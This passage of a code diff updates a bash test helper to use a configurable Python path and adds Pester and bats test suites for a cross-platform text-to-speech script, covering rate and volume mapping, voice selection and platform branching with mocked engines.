+    export PEON_PY
+  else
+    printf 'setup.bash: python3 not found on PATH; install Python 3 to run these tests\n' >&2
+    return 1 2>/dev/null || exit 1
+  fi
+fi
+
 # Create isolated test environment so we never touch real config
 setup_test_env() {
   TEST_DIR="$(mktemp -d)"
@@ -453,7 +467,7 @@ run_peon_tts() {
   local tts_enabled="${4:-true}"
 
   # Write TTS section into config.json so the Python block picks it up
-  /usr/bin/python3 -c "
+  "$PEON_PY" -c "
 import json, sys
 cfg = json.load(open('$TEST_DIR/config.json'))
 cfg['tts'] = {
@@ -470,12 +484,12 @@ json.dump(cfg, open('$TEST_DIR/config.json', 'w'))
   # Inject speech_text into manifest sound entries so the Python TTS
   # resolution chain finds it.  An empty string means no speech_text field.
   if [ -n "$speech_text" ]; then
-    /usr/bin/python3 -c "
+    "$PEON_PY" -c "
 import json
 m = json.load(open('$TEST_DIR/packs/peon/manifest.json'))
 for cat in m.get('categories', {}).values():
     for entry in cat.get('sounds', []):
-        entry['speech_text'] = $(printf '%s' "$speech_text" | /usr/bin/python3 -c 'import json,sys; print(json.dumps(sys.stdin.read()))')
+        entry['speech_text'] = $(printf '%s' "$speech_text" | "$PEON_PY" -c 'import json,sys; print(json.dumps(sys.stdin.read()))')
 json.dump(m, open('$TEST_DIR/packs/peon/manifest.json', 'w'))
 "
   fi
@@ -614,7 +628,7 @@ mobile_cmdline() {
 # Helper: enable debug logging in the test config
 # Replaces the copy-pasted python3 JSON manipulation boilerplate
 enable_debug_logging() {
-  /usr/bin/python3 -c "
+  "$PEON_PY" -c "
 import json
 cfg = json.load(open('$TEST_DIR/config.json'))
 cfg['debug'] = True

--- a/tests/tts-native.Tests.ps1
+++ b/tests/tts-native.Tests.ps1
@@ -1,0 +1,503 @@
+# Pester 5 tests for scripts/tts-native.ps1 (Windows SAPI5 TTS backend).
+# Run: Invoke-Pester -Path tests/tts-native.Tests.ps1
+#
+# Strategy:
+#   The script has two cooperating halves. The "pure" half -- rate/volume unit
+#   conversion, input trimming, voice-selection fall-through logic -- is
+#   verified by dot-sourcing helper functions out of the script and calling
+#   them directly. The "impure" half -- the actual SpeechSynthesizer invocation
+#   -- is verified via a side-effect trace: when the env var
+#   PEON_TTS_DRY_RUN is set to "1", the script writes the resolved SAPI
+#   parameters (rate, volume, selected voice, text) as a JSON object to
+#   $env:PEON_TTS_TRACE_FILE and exits 0 without calling Speak(). This
+#   mirrors the design doc's allowance of "assert on script output / side
+#   effects ... rather than mocking the .NET class directly".
+#
+# The helper-function dot-source pattern requires the script to define its
+# helpers before the main logic and to skip the main logic when dot-sourced
+# with the -DotSource switch. That plumbing is part of the implementation.
+
+BeforeAll {
+    $script:RepoRoot = Split-Path $PSScriptRoot -Parent
+    $script:TtsNativePath = Join-Path (Join-Path $script:RepoRoot "scripts") "tts-native.ps1"
+
+    # Helper: run tts-native.ps1 in dry-run mode and return the trace object.
+    # Dry-run captures the resolved SAPI parameters before Speak() is called.
+    function Invoke-TtsNativeDryRun {
+        param(
+            [string]$InputText = "",
+            [string]$Voice = "default",
+            [double]$Rate = 1.0,
+            [double]$Vol = 0.5,
+            [switch]$ListVoices,
+            [switch]$Debug
+        )
+
+        $tracePath = Join-Path $env:TEMP "peon-tts-trace-$([guid]::NewGuid().ToString('N').Substring(0,8)).json"
+
+        $argList = @("-NoProfile", "-NonInteractive", "-File", $script:TtsNativePath)
+        if ($ListVoices) {
+            $argList += "-ListVoices"
+        } else {
+            $argList += @("-Voice", $Voice, "-Rate", $Rate, "-Vol", $Vol)
+        }
+
+        $psi = New-Object System.Diagnostics.ProcessStartInfo
+        $psi.FileName = "powershell.exe"
+        $psi.Arguments = ($argList | ForEach-Object {
+            if ($_ -match '\s') { "`"$_`"" } else { "$_" }
+        }) -join " "
+        $psi.UseShellExecute = $false
+        $psi.RedirectStandardInput = $true
+        $psi.RedirectStandardOutput = $true
+        $psi.RedirectStandardError = $true
+        $psi.CreateNoWindow = $true
+        $psi.Environment["PEON_TTS_DRY_RUN"] = "1"
+        $psi.Environment["PEON_TTS_TRACE_FILE"] = $tracePath
+        if ($Debug) { $psi.Environment["PEON_DEBUG"] = "1" }
+
+        $proc = New-Object System.Diagnostics.Process
+        $proc.StartInfo = $psi
+        try {
+            $proc.Start() | Out-Null
+            if ($InputText) {
+                $proc.StandardInput.Write($InputText)
+            }
+            $proc.StandardInput.Close()
+
+            $stdoutTask = $proc.StandardOutput.ReadToEndAsync()
+            $stderrTask = $proc.StandardError.ReadToEndAsync()
+
+            if (-not $proc.WaitForExit(15000)) {
+                $proc.Kill()
+                throw "tts-native.ps1 timed out"
+            }
+
+            $stdout = $stdoutTask.Result
+            $stderr = $stderrTask.Result
+            $exitCode = $proc.ExitCode
+        } finally {
+            $proc.Dispose()
+        }
+
+        $trace = $null
+        if (Test-Path $tracePath) {
+            $trace = Get-Content $tracePath -Raw -Encoding UTF8 | ConvertFrom-Json
+            Remove-Item $tracePath -Force -ErrorAction SilentlyContinue
+        }
+
+        return @{
+            ExitCode = $exitCode
+            Stdout   = $stdout
+            Stderr   = $stderr
+            Trace    = $trace
+        }
+    }
+}
+
+# ============================================================
+# Structural / parse validation
+# ============================================================
+
+Describe "tts-native.ps1 structural validation" {
+    It "exists in scripts/" {
+        $script:TtsNativePath | Should -Exist
+    }
+
+    It "has valid PowerShell syntax" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $errors = $null
+        $null = [System.Management.Automation.PSParser]::Tokenize($content, [ref]$errors)
+        $errors.Count | Should -Be 0
+    }
+
+    It "contains a comment-based help header near the top" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        # First block-comment must start within the first ~40 lines and contain
+        # .SYNOPSIS and at least one .PARAMETER / .EXAMPLE marker.
+        $content | Should -Match '(?s)^\s*<#.*\.SYNOPSIS.*\.PARAMETER.*\.EXAMPLE.*#>'
+    }
+
+    It "declares InputText with ValueFromPipeline" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '(?s)\[Parameter\(\s*ValueFromPipeline\s*=\s*\$true\s*\)\][^}]*\[string\]\s*\$InputText'
+    }
+
+    It "declares Voice parameter with 'default' default" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[string\]\s*\$Voice\s*=\s*"default"'
+    }
+
+    It "declares Rate parameter as double with 1.0 default" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[double\]\s*\$Rate\s*=\s*1\.0'
+    }
+
+    It "declares Vol parameter as double with 0.5 default" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[double\]\s*\$Vol\s*=\s*0\.5'
+    }
+
+    It "declares ListVoices as a switch parameter" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[switch\]\s*\$ListVoices'
+    }
+
+    It "uses begin/process/end blocks for pipeline input" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '(?ms)^\s*begin\s*\{'
+        $content | Should -Match '(?ms)^\s*process\s*\{'
+        $content | Should -Match '(?ms)^\s*end\s*\{'
+    }
+
+    It "loads System.Speech via Add-Type" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match 'Add-Type\s+-AssemblyName\s+System\.Speech'
+    }
+
+    It "does not contain ExecutionPolicy Bypass" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Not -Match "ExecutionPolicy Bypass"
+    }
+
+    It "applies the rate formula [int][math]::Round((rate-1.0)*10)" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[int\]\[math\]::Round\(\s*\(\s*\$Rate\s*-\s*1\.0\s*\)\s*\*\s*10\s*\)'
+    }
+
+    It "applies the volume formula [int][math]::Round(Vol*100)" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[int\]\[math\]::Round\(\s*\$Vol\s*\*\s*100\s*\)'
+    }
+
+    It "clamps SAPI rate into -10..+10" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[math\]::Max\(\s*-10'
+        $content | Should -Match '\[math\]::Min\(\s*10'
+    }
+
+    It "clamps SAPI volume into 0..100" {
+        $content = Get-Content $script:TtsNativePath -Raw
+        $content | Should -Match '\[math\]::Max\(\s*0'
+        $content | Should -Match '\[math\]::Min\(\s*100'
+    }
+}
+
+# ============================================================
+# Rate mapping (dry-run trace)
+# ============================================================
+
+Describe "tts-native.ps1 rate mapping" {
+    It "Rate 1.0 maps to SAPI rate 0" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Rate 1.0
+        $r.ExitCode | Should -Be 0
+        $r.Trace | Should -Not -BeNullOrEmpty
+        $r.Trace.SapiRate | Should -Be 0
+    }
+
+    It "Rate 0.5 maps to SAPI rate -5" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Rate 0.5
+        $r.Trace.SapiRate | Should -Be -5
+    }
+
+    It "Rate 2.0 maps to SAPI rate +10" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Rate 2.0
+        $r.Trace.SapiRate | Should -Be 10
+    }
+
+    It "Rate 5.0 is clamped to SAPI +10" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Rate 5.0
+        $r.Trace.SapiRate | Should -Be 10
+    }
+
+    It "Rate 0.0 is clamped to SAPI -10" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Rate 0.0
+        $r.Trace.SapiRate | Should -Be -10
+    }
+}
+
+# ============================================================
+# Volume mapping (dry-run trace)
+# ============================================================
+
+Describe "tts-native.ps1 volume mapping" {
+    It "Vol 0.5 maps to SAPI volume 50" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Vol 0.5
+        $r.Trace.SapiVolume | Should -Be 50
+    }
+
+    It "Vol 0.0 maps to SAPI volume 0" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Vol 0.0
+        $r.Trace.SapiVolume | Should -Be 0
+    }
+
+    It "Vol 1.0 maps to SAPI volume 100" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Vol 1.0
+        $r.Trace.SapiVolume | Should -Be 100
+    }
+
+    It "Vol 2.0 is clamped to SAPI 100" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Vol 2.0
+        $r.Trace.SapiVolume | Should -Be 100
+    }
+
+    It "Vol -1.0 is clamped to SAPI 0" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Vol -1.0
+        $r.Trace.SapiVolume | Should -Be 0
+    }
+}
+
+# ============================================================
+# Stdin pipeline binding
+# ============================================================
+
+Describe "tts-native.ps1 stdin handling" {
+    It "binds single-line stdin to the resolved text" {
+        $r = Invoke-TtsNativeDryRun -InputText "hello"
+        $r.ExitCode | Should -Be 0
+        $r.Trace.Text | Should -Be "hello"
+        $r.Trace.Spoke | Should -BeTrue
+    }
+
+    It "accumulates multi-line stdin and trims trailing whitespace" {
+        $r = Invoke-TtsNativeDryRun -InputText "line one`nline two`n"
+        $r.ExitCode | Should -Be 0
+        # Lines should be preserved in order with newline separators; trailing
+        # whitespace removed before synthesis.
+        $r.Trace.Text | Should -Match "line one"
+        $r.Trace.Text | Should -Match "line two"
+        $r.Trace.Text | Should -Not -Match '\s+$'
+    }
+
+    It "empty stdin exits 0 without invoking Speak" {
+        $r = Invoke-TtsNativeDryRun -InputText ""
+        $r.ExitCode | Should -Be 0
+        # Either no trace was written, or trace.Spoke is false.
+        if ($r.Trace) { $r.Trace.Spoke | Should -BeFalse }
+    }
+
+    It "whitespace-only stdin exits 0 without invoking Speak" {
+        $r = Invoke-TtsNativeDryRun -InputText "   `n  "
+        $r.ExitCode | Should -Be 0
+        if ($r.Trace) { $r.Trace.Spoke | Should -BeFalse }
+    }
+}
+
+# ============================================================
+# Voice selection
+# ============================================================
+
+Describe "tts-native.ps1 voice selection" {
+    It "uses 'default' as a sentinel that skips SelectVoice" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Voice "default"
+        $r.ExitCode | Should -Be 0
+        $r.Trace | Should -Not -BeNullOrEmpty
+        $r.Trace.SelectVoiceCalled | Should -BeFalse
+    }
+
+    It "selects an installed voice when its name matches" {
+        # Ask the OS for the first installed voice so the test is portable
+        # across Windows 10 / 11 images.
+        Add-Type -AssemblyName System.Speech -ErrorAction SilentlyContinue
+        $voices = [System.Speech.Synthesis.SpeechSynthesizer]::new().GetInstalledVoices() | ForEach-Object { $_.VoiceInfo.Name }
+        if (-not $voices -or $voices.Count -eq 0) {
+            Set-ItResult -Skipped -Because "no SAPI voices installed on this runner"
+            return
+        }
+        $first = $voices[0]
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Voice $first
+        $r.ExitCode | Should -Be 0
+        $r.Trace.SelectVoiceCalled | Should -BeTrue
+        $r.Trace.SelectedVoice | Should -Be $first
+    }
+
+    It "falls through to the engine default when the voice is not installed" {
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Voice "NoSuchVoiceABC123" -Debug
+        $r.ExitCode | Should -Be 0
+        $r.Trace.SelectVoiceCalled | Should -BeFalse
+        # With PEON_DEBUG=1, a diagnostic line should appear on stderr.
+        $r.Stderr | Should -Match "NoSuchVoiceABC123"
+    }
+}
+
+# ============================================================
+# -ListVoices
+# ============================================================
+
+Describe "tts-native.ps1 -ListVoices" {
+    It "prints one voice name per line and exits 0" {
+        $r = Invoke-TtsNativeDryRun -ListVoices
+        $r.ExitCode | Should -Be 0
+        # Stdout should contain at least one line that looks like a voice name.
+        $lines = $r.Stdout -split "`r?`n" | Where-Object { $_ -ne "" }
+        if ($lines.Count -eq 0) {
+            Set-ItResult -Skipped -Because "no SAPI voices installed on this runner"
+            return
+        }
+        $lines.Count | Should -BeGreaterThan 0
+    }
+
+    It "does not read stdin in -ListVoices mode" {
+        # Pipe some text: with -ListVoices it must be ignored (the script
+        # should never call Speak). We verify no trace with Spoke=true is
+        # written -- the dry-run helper already disables Speak, but in
+        # -ListVoices mode the script must exit early before writing a
+        # synthesis trace.
+        $r = Invoke-TtsNativeDryRun -InputText "ignored input" -ListVoices
+        $r.ExitCode | Should -Be 0
+        if ($r.Trace) {
+            $r.Trace.Spoke | Should -BeFalse
+        }
+    }
+}
+
+# ============================================================
+# Error containment
+# ============================================================
+
+Describe "tts-native.ps1 error containment" {
+    It "exits 0 even when PEON_DEBUG is on and input is empty" {
+        $r = Invoke-TtsNativeDryRun -InputText "" -Debug
+        $r.ExitCode | Should -Be 0
+    }
+
+    It "never writes to stderr unless PEON_DEBUG=1 (happy path)" {
+        $r = Invoke-TtsNativeDryRun -InputText "test"
+        # Stderr should be empty or whitespace-only in the default happy path.
+        $r.Stderr.Trim() | Should -BeNullOrEmpty
+    }
+}
+
+# ============================================================
+# Production-pipeline invocation path (card w3ciyq)
+#
+# The existing Invoke-TtsNativeDryRun helper uses `powershell -File` with
+# stdin redirected via the ProcessStartInfo APIs. That path exercises the
+# `[Console]::IsInputRedirected` fallback in end{} but does NOT exercise
+# the ValueFromPipeline binding of the process{} block -- which is the
+# path install.ps1's Invoke-TtsSpeak actually takes when it invokes
+# tts-native.ps1 via `'text' | & $script ...` inside a single PowerShell
+# session. These tests cover that production shape using
+# `powershell -Command` so the pipeline binding is evaluated in-process.
+# ============================================================
+
+Describe "tts-native.ps1 production-pipeline binding" {
+    It "binds piped text through the PowerShell pipeline (not IsInputRedirected)" {
+        $tracePath = Join-Path $env:TEMP "peon-tts-trace-$([guid]::NewGuid().ToString('N').Substring(0,8)).json"
+        $scriptPath = $script:TtsNativePath
+        # Escape single quotes for the inner command string.
+        $scriptPathEscaped = $scriptPath.Replace("'", "''")
+
+        # The production shape: `'hello' | & 'tts-native.ps1' -Voice ... -Rate ... -Vol ...`
+        # evaluated inside one powershell -Command session. This forces
+        # PowerShell to bind the stdin string through ValueFromPipeline.
+        $inner = "'hello' | & '$scriptPathEscaped' -Voice 'default' -Rate 1.0 -Vol 0.5"
+
+        $psi = New-Object System.Diagnostics.ProcessStartInfo
+        $psi.FileName = "powershell.exe"
+        $psi.Arguments = "-NoProfile -NonInteractive -Command `"$inner`""
+        $psi.UseShellExecute = $false
+        $psi.RedirectStandardOutput = $true
+        $psi.RedirectStandardError = $true
+        $psi.CreateNoWindow = $true
+        $psi.Environment["PEON_TTS_DRY_RUN"] = "1"
+        $psi.Environment["PEON_TTS_TRACE_FILE"] = $tracePath
+
+        $proc = New-Object System.Diagnostics.Process
+        $proc.StartInfo = $psi
+        try {
+            $proc.Start() | Out-Null
+            $stdoutTask = $proc.StandardOutput.ReadToEndAsync()
+            $stderrTask = $proc.StandardError.ReadToEndAsync()
+            if (-not $proc.WaitForExit(15000)) {
+                $proc.Kill()
+                throw "tts-native.ps1 timed out in production-pipeline test"
+            }
+            $exitCode = $proc.ExitCode
+            $stderr = $stderrTask.Result
+            $null = $stdoutTask.Result
+        } finally {
+            $proc.Dispose()
+        }
+
+        $trace = $null
+        if (Test-Path $tracePath) {
+            $trace = Get-Content $tracePath -Raw -Encoding UTF8 | ConvertFrom-Json
+            Remove-Item $tracePath -Force -ErrorAction SilentlyContinue
+        }
+
+        $exitCode | Should -Be 0
+        $trace | Should -Not -BeNullOrEmpty
+        $trace.Spoke | Should -BeTrue
+        $trace.Text | Should -Be "hello"
+    }
+}
+
+# ============================================================
+# Voice-name case insensitivity (card w3ciyq)
+#
+# -contains uses PowerShell's case-insensitive equality semantics, so an
+# uppercase voice argument resolves to a properly-cased installed voice
+# without extra work. This test codifies that behaviour as intended
+# rather than accidental, matching the skip-guard pattern used by the
+# other voice-dependent tests.
+# ============================================================
+
+Describe "tts-native.ps1 voice case insensitivity" {
+    It "resolves an uppercase voice name to the installed (properly-cased) voice" {
+        Add-Type -AssemblyName System.Speech -ErrorAction SilentlyContinue
+        $voices = [System.Speech.Synthesis.SpeechSynthesizer]::new().GetInstalledVoices() | ForEach-Object { $_.VoiceInfo.Name }
+        if (-not $voices -or $voices.Count -eq 0) {
+            Set-ItResult -Skipped -Because "no SAPI voices installed on this runner"
+            return
+        }
+        $first = $voices[0]
+        $upper = $first.ToUpper()
+        # Sanity: we actually need the upper-case form to differ from the
+        # canonical form to meaningfully test case-insensitivity.
+        if ($upper -ceq $first) {
+            Set-ItResult -Skipped -Because "first installed voice name is already uppercase"
+            return
+        }
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Voice $upper
+        $r.ExitCode | Should -Be 0
+        $r.Trace.SelectVoiceCalled | Should -BeTrue
+        # Tightened assertion (w3ciyq planner cycle 1 follow-up): require the
+        # resolved voice to be the canonical (properly-cased) installed name,
+        # not merely non-empty. This codifies the case-insensitive match
+        # contract -- the script must resolve an uppercase argument back to
+        # the installed canonical form, not fall back to a default voice.
+        $r.Trace.SelectedVoice | Should -Be $first
+    }
+}
+
+# ============================================================
+# SAPI5 spaced-voice-name binding (card w3ciyq)
+#
+# Guards the bash -> powershell.exe -File arg handoff for realistic SAPI5
+# voice names containing spaces (e.g. "Microsoft David Desktop",
+# "Microsoft Zira Desktop"). The existing -Voice test only covers voice
+# names returned from GetInstalledVoices at runtime; this one asserts that
+# a spaced literal still arrives as a single intact -Voice argument.
+# ============================================================
+
+Describe "tts-native.ps1 SAPI5 spaced voice-name binding" {
+    It "preserves a spaced voice name across the powershell -File arg handoff" {
+        # Pass a hand-rolled spaced voice name that is unlikely to actually
+        # match anything. The dry-run trace records RequestedVoice verbatim,
+        # so we can assert the spaced name arrived intact regardless of
+        # whether the voice is installed.
+        $spaced = "Microsoft David Desktop"
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Voice $spaced
+        $r.ExitCode | Should -Be 0
+        $r.Trace | Should -Not -BeNullOrEmpty
+        $r.Trace.RequestedVoice | Should -Be $spaced
+    }
+
+    It "preserves a different spaced voice name (Microsoft Zira Desktop)" {
+        $spaced = "Microsoft Zira Desktop"
+        $r = Invoke-TtsNativeDryRun -InputText "test" -Voice $spaced
+        $r.ExitCode | Should -Be 0
+        $r.Trace.RequestedVoice | Should -Be $spaced
+    }
+}

--- a/tests/tts-native.bats
+++ b/tests/tts-native.bats
@@ -1,0 +1,619 @@
+#!/usr/bin/env bats
+#
+# Unit tests for scripts/tts-native.sh (Unix TTS backend).
+#
+# Unlike tests/tts.bats which exercises the integration layer with a mock
+# backend, this suite runs the real script against PATH-mocked engines
+# (uname, say, espeak-ng, piper, aplay, powershell.exe, python3) to verify:
+#   - platform branching via uname -s (Darwin / Linux / MINGW*/MSYS* / unknown)
+#   - engine priority on Linux (piper > espeak-ng > silent exit)
+#   - unit conversions (rate to wpm / length-scale, volume to amplitude)
+#   - contract behavior (empty stdin, default args, metacharacter safety,
+#     always-exit-0)
+#   - --list-voices output per platform
+#   - piper sample-rate sidecar handling
+
+# Locate the script under test and isolate each test in its own TEST_DIR.
+TTS_SCRIPT="$(cd "$(dirname "${BATS_TEST_FILENAME}")/.." && pwd)/scripts/tts-native.sh"
+
+setup() {
+  TEST_DIR="$(mktemp -d)"
+  export TEST_DIR
+  MOCK_BIN="$TEST_DIR/mock_bin"
+  mkdir -p "$MOCK_BIN"
+  export PEON_DIR="$TEST_DIR"
+  # Ensure no stray env from caller leaks in
+  unset PEON_DEBUG PEON_PIPER_MODEL
+}
+
+teardown() {
+  rm -rf "$TEST_DIR"
+}
+
+# --- Helpers ---
+
+# Install a mock binary at $MOCK_BIN/<name> that logs args and stdin to
+# $TEST_DIR/<name>.log, then exits with $exit_code (default 0).
+mock_cmd() {
+  local name="$1" exit_code="${2:-0}" stdout="${3:-}"
+  local path="$MOCK_BIN/$name"
+  {
+    printf '%s\n' '#!/bin/bash'
+    printf 'echo "ARGS: $*" >> "%s/%s.log"\n' "$TEST_DIR" "$name"
+    printf 'if [ ! -t 0 ]; then cat >> "%s/%s.stdin"; fi\n' "$TEST_DIR" "$name"
+    [ -n "$stdout" ] && printf 'printf %q\n' "$stdout"
+    printf 'exit %s\n' "$exit_code"
+  } > "$path"
+  chmod +x "$path"
+}
+
+# Create a uname stub that returns a specific kernel name.
+mock_uname() {
+  local kernel="$1"
+  cat > "$MOCK_BIN/uname" <<SCRIPT
+#!/bin/bash
+case "\$1" in
+  -s) printf '%s\n' '$kernel' ;;
+  *)  printf '%s\n' '$kernel' ;;
+esac
+SCRIPT
+  chmod +x "$MOCK_BIN/uname"
+}
+
+# Prepend mock bin to PATH (callers must invoke before running the script).
+with_mocks() {
+  export PATH="$MOCK_BIN:$PATH"
+}
+
+# Returns the contents of a mock's args log, newline-joined.
+mock_args() {
+  local name="$1"
+  if [ -f "$TEST_DIR/$name.log" ]; then
+    cat "$TEST_DIR/$name.log"
+  fi
+}
+
+mock_stdin() {
+  local name="$1"
+  if [ -f "$TEST_DIR/$name.stdin" ]; then
+    cat "$TEST_DIR/$name.stdin"
+  fi
+}
+
+mock_called() {
+  local name="$1"
+  [ -f "$TEST_DIR/$name.log" ]
+}
+
+# ============================================================
+# Script existence + syntax
+# ============================================================
+
+@test "tts-native.sh: file exists and is executable" {
+  [ -f "$TTS_SCRIPT" ]
+  [ -x "$TTS_SCRIPT" ]
+}
+
+@test "tts-native.sh: passes bash -n syntax check" {
+  bash -n "$TTS_SCRIPT"
+}
+
+# ============================================================
+# Platform branching via uname
+# ============================================================
+
+@test "macOS: Darwin uname invokes say with -r 200 (rate=1.0)" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  echo "hello" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  [ $? -eq 0 ]
+  mock_called "say"
+  local args; args=$(mock_args "say")
+  [[ "$args" == *"-r 200"* ]]
+}
+
+@test "macOS: voice != default adds -v <voice>" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "Alex" "1.0" "0.5"
+  local args; args=$(mock_args "say")
+  [[ "$args" == *"-v Alex"* ]]
+  [[ "$args" == *"-r 200"* ]]
+}
+
+@test "macOS: voice=default omits -v flag" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  local args; args=$(mock_args "say")
+  [[ "$args" != *"-v default"* ]]
+  [[ "$args" != *"-v "* ]]
+}
+
+@test "Linux: piper preferred when binary + model both available" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mock_cmd "espeak-ng"
+  mkdir -p "$TEST_DIR/piper-models"
+  touch "$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  mock_called "piper"
+  mock_called "aplay"
+  ! mock_called "espeak-ng"
+  local args; args=$(mock_args "piper")
+  [[ "$args" == *"--length-scale 1.00"* ]]
+}
+
+@test "Linux: falls back to espeak-ng when piper binary missing" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  # No piper mock → command -v piper returns nonzero
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  mock_called "espeak-ng"
+  local args; args=$(mock_args "espeak-ng")
+  [[ "$args" == *"-s 175"* ]]
+  [[ "$args" == *"-a 50"* ]]
+}
+
+@test "Linux: falls back to espeak-ng when piper binary exists but model absent" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "espeak-ng"
+  # No model file on disk → piper probe fails the -f check
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  mock_called "espeak-ng"
+  ! mock_called "piper"
+}
+
+@test "Linux: no engines installed → exits 0 silently" {
+  mock_uname "Linux"
+  # Neither piper nor espeak-ng on PATH
+  with_mocks
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5' 2>&1"
+  [ "$status" -eq 0 ]
+  # No stderr output without PEON_DEBUG
+  [ -z "$output" ] || [ "$output" = "" ]
+}
+
+@test "Linux: no engines + PEON_DEBUG=1 → stderr contains diagnostic" {
+  mock_uname "Linux"
+  with_mocks
+  run bash -c "PEON_DEBUG=1 bash -c \"echo 'hi' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5'\" 2>&1"
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"no TTS engine found"* ]]
+}
+
+@test "MSYS2: MINGW64_NT uname routes to powershell.exe with -File tts-native.ps1" {
+  mock_uname "MINGW64_NT-10.0"
+  mock_cmd "powershell.exe"
+  # Create a dummy tts-native.ps1 so the [ -f ] guard passes
+  mkdir -p "$PEON_DIR/scripts"
+  echo "# dummy" > "$PEON_DIR/scripts/tts-native.ps1"
+  with_mocks
+  echo "hello" | bash "$TTS_SCRIPT" "Zira" "1.0" "0.5"
+  mock_called "powershell.exe"
+  local args; args=$(mock_args "powershell.exe")
+  [[ "$args" == *"-NoProfile"* ]]
+  [[ "$args" == *"-File"* ]]
+  [[ "$args" == *"tts-native.ps1"* ]]
+  [[ "$args" == *"-Voice Zira"* ]]
+  [[ "$args" == *"-Rate 1.0"* ]]
+  [[ "$args" == *"-Vol 0.5"* ]]
+}
+
+@test "MSYS2: missing tts-native.ps1 → exits 0 silently (no ps invocation)" {
+  mock_uname "MSYS_NT-10.0"
+  mock_cmd "powershell.exe"
+  # Do NOT create tts-native.ps1
+  with_mocks
+  run bash -c "echo 'hello' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5' 2>&1"
+  [ "$status" -eq 0 ]
+  ! mock_called "powershell.exe"
+}
+
+@test "MSYS2: missing tts-native.ps1 + PEON_DEBUG=1 logs diagnostic" {
+  mock_uname "MINGW32_NT-10.0"
+  with_mocks
+  run bash -c "PEON_DEBUG=1 bash -c \"echo 'hello' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5'\" 2>&1"
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"not found"* ]] || [[ "$output" == *"tts-native.ps1"* ]]
+}
+
+@test "Unknown platform: exits 0, no engines invoked" {
+  mock_uname "SunOS"
+  mock_cmd "say"
+  mock_cmd "espeak-ng"
+  with_mocks
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5' 2>&1"
+  [ "$status" -eq 0 ]
+  ! mock_called "say"
+  ! mock_called "espeak-ng"
+}
+
+@test "Unknown platform + PEON_DEBUG=1 logs 'unsupported platform'" {
+  mock_uname "Plan9"
+  with_mocks
+  run bash -c "PEON_DEBUG=1 bash -c \"echo 'hi' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5'\" 2>&1"
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"unsupported platform"* ]]
+}
+
+# ============================================================
+# Unit conversion correctness
+# ============================================================
+
+@test "Rate 2.0: macOS wpm = 400" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "2.0" "0.5"
+  [[ "$(mock_args say)" == *"-r 400"* ]]
+}
+
+@test "Rate 0.5: macOS wpm = 100" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "0.5" "0.5"
+  [[ "$(mock_args say)" == *"-r 100"* ]]
+}
+
+@test "Rate 2.0: espeak-ng wpm = 350" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "2.0" "0.5"
+  [[ "$(mock_args espeak-ng)" == *"-s 350"* ]]
+}
+
+@test "Rate 0.5: espeak-ng wpm is an integer near 87-88" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "0.5" "0.5"
+  local args; args=$(mock_args espeak-ng)
+  # awk truncates 87.5 to 87 with "%d" format
